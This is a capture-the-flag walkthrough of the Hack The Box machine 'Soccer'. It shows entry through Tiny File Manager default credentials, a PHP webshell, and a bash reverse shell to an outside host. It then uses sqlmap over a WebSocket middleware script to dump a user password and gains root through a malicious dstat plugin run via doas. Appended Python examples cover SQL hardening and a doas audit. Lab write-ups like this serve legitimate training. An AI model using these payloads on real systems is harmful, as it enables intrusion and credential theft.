
HTB{Soccer}

Hello everyone, today we are looking at an easy Linux box called Soccer.

As usual, we start with an nmap scan.

nmap -p- --min-rate 10000 10.10.11.194
Starting Nmap 7.80 ( https://nmap.org ) at 2023-06-04 13:32 EDT
Nmap scan report for 10.10.11.194
Host is up (0.093s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
9091/tcp open  xmltec-xmlmail

So we have 3 open ports:

• an SSH port

• an HTTP port

• and port 9091, identified as xmltec-xmlmail

The website redirects us to soccer.htb.

We start by brute-forcing subdomains with ffuf.

ffuf -u http://10.10.11.194 -H "Host: FUZZ.soccer.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -ac

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.194
 :: Wordlist         : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt
 :: Header           : Host: FUZZ.soccer.htb
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: all
________________________________________________

:: Progress: [19966/19966] :: Job [1/1] :: 427 req/sec :: Duration: [0:00:47] :: Errors: 0 ::

We get no results.

So this time we brute-force directories and files instead.

feroxbuster -u http://soccer.htb

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.9.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://soccer.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.9.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        7l       12w      162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        7l       10w      162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      711l     4253w   403502c http://soccer.htb/ground2.jpg
200      GET     2232l     4070w   223875c http://soccer.htb/ground4.jpg
200      GET      809l     5093w   490253c http://soccer.htb/ground1.jpg
200      GET      494l     1440w    96128c http://soccer.htb/ground3.jpg
200      GET      147l      526w     6917c http://soccer.htb/
301      GET        7l       12w      178c http://soccer.htb/tiny => http://soccer.htb/tiny/
301      GET        7l       12w      178c http://soccer.htb/tiny/uploads => http://soccer.htb/tiny/uploads/
[####################] - 1m     90021/90021   0s      found:7       errors:0      
[####################] - 57s    30000/30000   521/s   http://soccer.htb/ 
[####################] - 56s    30000/30000   526/s   http://soccer.htb/tiny/ 
[####################] - 56s    30000/30000   528/s   http://soccer.htb/tiny/uploads/ 

We find a directory named “tiny”. It is an instance of Tiny File Manager.

Tiny File Manager is a web-based PHP file manager. It is a simple, fast and small single-file PHP web application that can be dropped into any folder on your server, ready to be used in multiple languages to store, upload, edit and manage files and folders online through a web browser.

The application runs on PHP 5.5+, allows creating multiple users, each with their own directory, has built-in support for managing text files with the Cloud9 IDE, and supports syntax highlighting for over 150 languages and over 35 themes.

The GitHub README gives the following instructions for setting up Tiny File Manager:

Download the ZIP with the latest version from the master branch.
Copy tinyfilemanager.php to your web space, that's all 🙂 You can also rename “tinyfilemanager.php” to something else, you know what I mean.
Default username/password: admin/admin@123 and user/12345.
Warning: please set your own username and password in $auth_users before use. The password is hashed with password_hash(). To generate a new password hash, click here.
To enable/disable authentication, set $use_auth to true or false.
Add your own config.php file in the same folder to use it as an additional configuration file.
To work offline without CDN resources, use the offline branch.

This gives us two sets of default credentials:

  • “admin” / “admin@123” and
  • “user” / “12345”.

Both sets of credentials work here, so we log in as administrator.

Once logged in, the page lists the files that make up the Soccer website:

We can upload a file to tiny/uploads.

So we create a simple PHP webshell, upload it to tiny/uploads, and confirm that it executes code:

<?php system($_REQUEST["cmd"]); ?>
curl http://soccer.htb/tiny/uploads/cmd.php -d 'cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

We start nc listening on port 443 on our host and trigger a reverse shell by sending a bash reverse shell through the webshell:

curl http://soccer.htb/tiny/uploads/cmd.php -d 'cmd=bash -c "bash -i >%26 /dev/tcp/10.10.14.6/443 0>%261"'
nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.194 55140
bash: cannot set terminal process group (1048): Inappropriate ioctl for device
bash: no job control in this shell
www-data@soccer:~/html/tiny/uploads$ 

Now that we have a foothold on the machine, it is time to enumerate in order to escalate our privileges.

Via linpeas, we find another domain name in /etc/hosts: soc-player.soccer.htb.

The site looks exactly like the other one, except that there are additional options in the menu bar.

The match page mentions that we can get a free ticket if we sign up.

So we sign up on the site.

After signing up, we are redirected to /check, where we get a ticket id.

We can enter a ticket id in the field.

Looking more closely in the browser at the requests being sent, we see that a request is made to port 9091 and gets a 101 status.

Status code 101 is a Switching Protocols response.

Port 9091 is a WebSocket server.
After some research, I found this:
https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html

We slightly modify the code and run sqlmap against the middleware.

from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from urllib.parse import unquote, urlparse
from websocket import create_connection

ws_server = "ws://soc-player.soccer.htb:9091/"

def send_ws(payload):
	ws = create_connection(ws_server)
	# If the server returns a response on connect, use below line	
	#resp = ws.recv() # If server returns something like a token on connect you can find and extract from here
	
	# For our case, format the payload in JSON
	message = unquote(payload).replace('"','\'') # replacing " with ' to avoid breaking JSON structure
	data = '{"id":"%s"}' % message

	ws.send(data)
	resp = ws.recv()
	ws.close()

	if resp:
		return resp
	else:
		return ''

def middleware_server(host_port,content_type="text/plain"):

	class CustomHandler(SimpleHTTPRequestHandler):
		def do_GET(self) -> None:
			self.send_response(200)
			try:
				payload = urlparse(self.path).query.split('=',1)[1]
			except IndexError:
				payload = False
				
			if payload:
				content = send_ws(payload)
			else:
				content = 'No parameters specified!'

			self.send_header("Content-type", content_type)
			self.end_headers()
			self.wfile.write(content.encode())
			return

	class _TCPServer(TCPServer):
		allow_reuse_address = True

	httpd = _TCPServer(host_port, CustomHandler)
	httpd.serve_forever()


print("[+] Starting MiddleWare Server")
print("[+] Send payloads in http://localhost:8081/?id=*")

try:
	middleware_server(('0.0.0.0',8081))
except KeyboardInterrupt:
	pass

sqlmap -u "http://localhost:8081/?id=1"
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.6.7#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:08:52 /2022-12-19/

[15:08:52] [INFO] testing connection to the target URL
[15:08:52] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.9.0')
[15:08:52] [INFO] checking if the target is protected by some kind of WAF/IPS
[15:08:52] [INFO] testing if the target URL content is stable
[15:08:52] [INFO] target URL content is stable
[15:08:52] [INFO] testing if GET parameter 'id' is dynamic
[15:08:52] [WARNING] GET parameter 'id' does not appear to be dynamic
[15:08:53] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[15:08:53] [INFO] testing for SQL injection on GET parameter 'id'
[15:08:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:08:53] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:08:53] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:08:53] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:08:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[15:08:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:08:55] [INFO] testing 'Generic inline queries'
[15:08:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:08:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[15:08:55] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[15:08:55] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:09:06] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
[15:09:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:09:10] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:09:11] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] 
[15:09:21] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') 
[15:09:21] [INFO] checking if the injection point on GET parameter 'id' is a false positive

sqlmap identified the following injection point(s) with a total of 97 HTTP(s) requests:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 1962 FROM (SELECT(SLEEP(5)))qvRg)
---
[15:10:20] [INFO] the back-end DBMS is MySQL
[15:10:20] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
back-end DBMS: MySQL >= 5.0.12
[15:10:20] [INFO] fetched data logged to text files under '/home/selim/.local/share/sqlmap/output/localhost'

[*] ending @ 15:10:20 /2022-12-19/

❯ sqlmap -u "http://localhost:8081/?id=1" --dbs
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.6.7#stable}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:10:23 /2022-12-19/

[15:10:23] [INFO] resuming back-end DBMS 'mysql' 
[15:10:23] [INFO] testing connection to the target URL
[15:10:23] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.9.0')
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 1962 FROM (SELECT(SLEEP(5)))qvRg)
---
[15:10:23] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[15:10:23] [INFO] fetching database names
[15:10:23] [INFO] fetching number of databases
[15:10:23] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)                                   
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] 
[15:10:32] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
5
[15:10:37] [INFO] retrieved: 
[15:10:42] [INFO] adjusting time delay to 1 second due to good response times
mysql
[15:11:02] [INFO] retrieved: information_schema
[15:12:12] [INFO] retrieved: performance_s
[15:13:11] [ERROR] invalid character detected. retrying..
[15:13:11] [WARNING] increasing time delay to 2 seconds
chema
[15:13:38] [INFO] retrieved: sys
[15:14:01] [INFO] retrieved: soccer_db
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] soccer_db
[*] sys

[15:15:06] [INFO] fetched data logged to text files under '/home/selim/.local/share/sqlmap/output/localhost'

[*] ending @ 15:15:06 /2022-12-19/

❯ sqlmap -u "http://localhost:8081/?id=1" -D soccer_db --tables
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.6.7#stable}
|_ -| . [)]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:15:22 /2022-12-19/

[15:15:22] [INFO] resuming back-end DBMS 'mysql' 
[15:15:22] [INFO] testing connection to the target URL
[15:15:22] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.9.0')
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 1962 FROM (SELECT(SLEEP(5)))qvRg)
---
[15:15:22] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[15:15:22] [INFO] fetching tables for database: 'soccer_db'
[15:15:22] [INFO] fetching number of tables for database 'soccer_db'
[15:15:22] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)                                   
[15:15:25] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] 
1
[15:18:15] [INFO] retrieved: 
[15:18:25] [INFO] adjusting time delay to 1 second due to good response times
[15:18:30] [ERROR] invalid character detected. retrying..
[15:18:30] [WARNING] increasing time delay to 2 seconds
accoun
[15:19:15] [ERROR] invalid character detected. retrying..
[15:19:15] [WARNING] increasing time delay to 3 seconds
ts
Database: soccer_db
[1 table]
+----------+
| accounts |
+----------+

[15:19:38] [INFO] fetched data logged to text files under '/home/selim/.local/share/sqlmap/output/localhost'

[*] ending @ 15:19:38 /2022-12-19/


❯ sqlmap -u "http://localhost:8081/?id=1" -D soccer_db -T accounts --dump
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.6.7#stable}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:19:59 /2022-12-19/

[15:19:59] [INFO] resuming back-end DBMS 'mysql' 
[15:19:59] [INFO] testing connection to the target URL
[15:19:59] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.9.0')
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 1962 FROM (SELECT(SLEEP(5)))qvRg)
---
[15:19:59] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[15:19:59] [INFO] fetching columns for table 'accounts' in database 'soccer_db'
[15:19:59] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)                                   
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] 
[15:20:39] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
4
[15:20:39] [INFO] retrieved: 
[15:20:50] [INFO] adjusting time delay to 1 second due to good response times
id
[15:20:56] [INFO] retrieved: email
[15:21:13] [INFO] retrieved: 
[15:21:20] [ERROR] invalid character detected. retrying..
[15:21:20] [WARNING] increasing time delay to 2 seconds
userna
[15:22:07] [ERROR] invalid character detected. retrying..
[15:22:07] [WARNING] increasing time delay to 3 seconds
me
[15:22:25] [INFO] retrieved: passwor
[15:23:52] [ERROR] invalid character detected. retrying..
[15:23:52] [WARNING] increasing time delay to 4 seconds
d
[15:24:05] [INFO] fetching entries for table 'accounts' in database 'soccer_db'
[15:24:05] [INFO] fetching number of entries for table 'accounts' in database 'soccer_db'
[15:24:05] [INFO] retrieved: 1
[15:24:10] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)                          
player@player.htb
[15:28:19] [ERROR] invalid character detected. retrying..
[15:28:19] [WARNING] increasing time delay to 5 seconds

[15:28:19] [INFO] retrieved: 1324
[15:29:18] [INFO] retrieved: PlayerOftheMatch2
[15:34:13] [ERROR] invalid character detected. retrying..
[15:34:13] [WARNING] increasing time delay to 6 seconds
02
[15:34:46] [ERROR] invalid character detected. retrying..
[15:34:46] [WARNING] increasing time delay to 7 seconds
[15:35:02] [ERROR] invalid character detected. retrying..
[15:35:02] [WARNING] increasing time delay to 8 seconds
[15:35:19] [ERROR] invalid character detected. retrying..
[15:35:19] [WARNING] increasing time delay to 9 seconds
2
[15:35:38] [INFO] retrieved: player
Database: soccer_db
Table: accounts
[1 entry]
+------+-------------------+----------------------+----------+
| id   | email             | password             | username |
+------+-------------------+----------------------+----------+
| 1324 | player@player.htb | PlayerOftheMatch2022 | player   |
+------+-------------------+----------------------+----------+

[15:38:34] [INFO] table 'soccer_db.accounts' dumped to CSV file '/home/selim/.local/share/sqlmap/output/localhost/dump/soccer_db/accounts.csv'
[15:38:34] [INFO] fetched data logged to text files under '/home/selim/.local/share/sqlmap/output/localhost'

[*] ending @ 15:38:34 /2022-12-19/
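The /check endpoint takes the ticket id from the WebSocket JSON message and, as the time-based payload above shows, the id ends up inside the SQL text. As an added illustration, not code from the box or from the original post, the following Python shows that pattern beside its hardened form. The box's handler code is not on the page, so the vulnerable function is an assumed reconstruction, and an in-memory sqlite3 table constructed to mirror the dumped accounts table stands in for the real MySQL backend.

```python
import json
import re
import sqlite3

# Constructed sample row mirroring the soccer_db.accounts dump on the page.
# sqlite3 stands in for the box's MySQL so the example runs offline.
ACCOUNTS = [(1324, "player@player.htb", "PlayerOftheMatch2022", "player")]


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (id INTEGER, email TEXT, password TEXT, username TEXT)")
    db.executemany("INSERT INTO accounts VALUES (?, ?, ?, ?)", ACCOUNTS)
    return db


def check_ticket_vulnerable(db: sqlite3.Connection, message: str) -> bool:
    """Assumed reconstruction of the /check handler behind ws://soc-player.soccer.htb:9091:
    the JSON 'id' field is pasted straight into the SQL text, which is what lets
    sqlmap's 'id=1 AND (SELECT ... SLEEP(5) ...)' probe execute as SQL."""
    ticket = json.loads(message)["id"]
    row = db.execute(f"SELECT id FROM accounts WHERE id = {ticket}").fetchone()
    return row is not None


def check_ticket_safe(db: sqlite3.Connection, message: str) -> bool:
    """Hardened form: a ticket id is a short decimal string, so reject anything else
    before it reaches the database, and bind the value instead of formatting it."""
    ticket = str(json.loads(message).get("id", ""))
    if not re.fullmatch(r"\d{1,10}", ticket):
        return False
    row = db.execute("SELECT id FROM accounts WHERE id = ?", (int(ticket),)).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    for msg in ('{"id":"1324"}', '{"id":"9999"}', '{"id":"9999 OR 1=1"}'):
        print(f"{msg:22} vulnerable={check_ticket_vulnerable(db, msg)} safe={check_ticket_safe(db, msg)}")
```

The hardened handler never lets non-numeric input reach the database, which also removes the timing side channel that sqlmap used to extract the table one character at a time.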

We discover the password of the user player and can switch to that user.

www-data@soccer:/home/player$ su player -
Password: 
player@soccer:~$

We continue our enumeration and find that the doas binary has the SUID bit set.

find / -perm -4000 -type f 2>/dev/null

-rwsr-xr-x 1 root root 42K Nov 17 09:09 /usr/local/bin/doas

doas is an alternative to sudo usually found on OpenBSD, but it can also be installed on Debian-based Linux distributions such as Ubuntu.

Looking at which rights we might have, we see that we can run /usr/bin/dstat as root without a password.

cat /usr/local/etc/doas.conf 
permit nopass player as root cmd /usr/bin/dstat

https://book.hacktricks.xyz/linux-hardening/privilege-escalation#doas

dstat is a tool for getting information about the system. Looking at the man page, there is a section about plugins that says:

While anyone can create their own dstat plugins (and contribute them), dstat ships with a number of plugins that greatly extend its capabilities.

At the very bottom of the page, there is a Files section:

Paths that may contain external dstat_*.py plugins:

~/.dstat/
(path of binary)/plugins/
/usr/share/dstat/
/usr/local/share/dstat/

We can therefore create a malicious plugin named

dstat_[plugin name].py

So we write a very simple Python plugin.

import os

os.system("/bin/bash")

Luckily, /usr/local/share/dstat is writable, so we place our plugin inside it.

echo -e 'import os\n\nos.system("/bin/bash")' > /usr/local/share/dstat/dstat_0xdf.py

And we run doas.

player@soccer:~$ doas /usr/bin/dstat --0xdf
/usr/bin/dstat:2619: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
  import imp
root@soccer:/home/player#

And voilà, we are root.
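The whole chain rests on two things an administrator can audit: a doas rule that grants root for a command that loads plugins, and a plugin directory that an unprivileged user can write to. As an added example (not code from the box or the original post), the following Python parses doas.conf rules and reports the combination; the plugin paths are the ones from the dstat man page quoted above, and `make_fake_stat` is a constructed stand-in for os.stat so the demo can reproduce the box's layout offline.

```python
import os
import re
import stat
from types import SimpleNamespace
from typing import Callable, Dict, List

# System-wide plugin search paths from the dstat man page (~/.dstat and <binary dir>/plugins/ work the same way)
PLUGIN_DIRS: Dict[str, List[str]] = {"/usr/bin/dstat": ["/usr/share/dstat", "/usr/local/share/dstat"]}
OPTIONS = {"nopass", "nolog", "persist", "keepenv"}


def parse_doas_rules(conf: str) -> List[dict]:
    """Parse 'permit|deny [options] identity [as target] [cmd command [args ...]]'.
    target None means any target user is allowed (doas itself defaults to root)."""
    rules = []
    for raw in conf.splitlines():
        line = re.sub(r"#.*", "", raw)
        line = re.sub(r"setenv\s*\{[^}]*\}", "", line).strip()  # setenv {...} may contain spaces
        if not line:
            continue
        tokens = line.split()
        rule = {"action": tokens.pop(0), "options": set(), "identity": None, "target": None, "cmd": None}
        while tokens and tokens[0] in OPTIONS:
            rule["options"].add(tokens.pop(0))
        if tokens:
            rule["identity"] = tokens.pop(0)
        if tokens[:1] == ["as"]:
            rule["target"], tokens = tokens[1], tokens[2:]
        if tokens[:1] == ["cmd"]:
            rule["cmd"] = tokens[1]
        rules.append(rule)
    return rules


def writable_by_non_root(path: str, stat_fn: Callable = os.stat) -> bool:
    """World-writable, or group-writable by a non-root group. A sticky bit would not
    help: dropping a new dstat_*.py file is enough, nothing has to be deleted."""
    try:
        st = stat_fn(path)
    except FileNotFoundError:
        return False
    return bool(st.st_mode & stat.S_IWOTH) or (bool(st.st_mode & stat.S_IWGRP) and st.st_gid != 0)


def audit_doas(conf: str, stat_fn: Callable = os.stat) -> List[str]:
    """Flag permit rules that reach root through a plugin-loading command whose plugin
    directory an unprivileged user can write to. A rule without 'cmd' allows any command."""
    findings = []
    for rule in parse_doas_rules(conf):
        if rule["action"] != "permit" or rule["target"] not in (None, "root"):
            continue
        for cmd in ([rule["cmd"]] if rule["cmd"] else list(PLUGIN_DIRS)):
            for d in PLUGIN_DIRS.get(cmd, []):
                if writable_by_non_root(d, stat_fn):
                    auth = "nopass" if "nopass" in rule["options"] else "password"
                    findings.append(f"{rule['identity']} -> root via {cmd} ({auth}): {d} is writable by non-root")
    return findings


def make_fake_stat(modes: Dict[str, int], gid: int = 0) -> Callable:
    """Constructed stand-in for os.stat so the audit can run offline against a
    hypothetical layout; the demo below reproduces the permissions seen on the box."""
    def fake(path: str):
        if path not in modes:
            raise FileNotFoundError(path)
        return SimpleNamespace(st_mode=stat.S_IFDIR | modes[path], st_gid=gid)
    return fake


if __name__ == "__main__":
    conf = "permit nopass player as root cmd /usr/bin/dstat\n"  # the rule from the box's doas.conf
    layout = {"/usr/share/dstat": 0o755, "/usr/local/share/dstat": 0o777}  # constructed modes
    print("\n".join(audit_doas(conf, make_fake_stat(layout))) or "no findings")
```

On a real host, call audit_doas with the contents of /usr/local/etc/doas.conf and the default os.stat; the fix is either to drop the rule or to make the plugin directories root-owned and mode 755.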